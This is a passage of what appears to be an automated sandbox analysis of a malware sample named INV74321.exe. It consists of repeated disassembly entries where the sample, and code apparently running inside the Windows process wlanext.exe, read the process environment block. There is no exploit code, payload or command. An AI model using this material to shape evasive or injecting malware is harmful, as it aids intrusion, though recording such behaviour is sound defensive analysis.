          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_00B88DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B5A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B13D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B53540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B18EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B8FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B8FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B08E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03773B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03773B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03815BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03751B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03751B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037D4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03784A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03784A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03763A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03758A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037D41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03760050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03760050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03814015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03814015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037458EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037890AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03802073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03811074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03744F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03744F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0381070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0381070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037837F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03758794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03810EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03810EA5 mov eax, dword ptr fs:[00000030h]
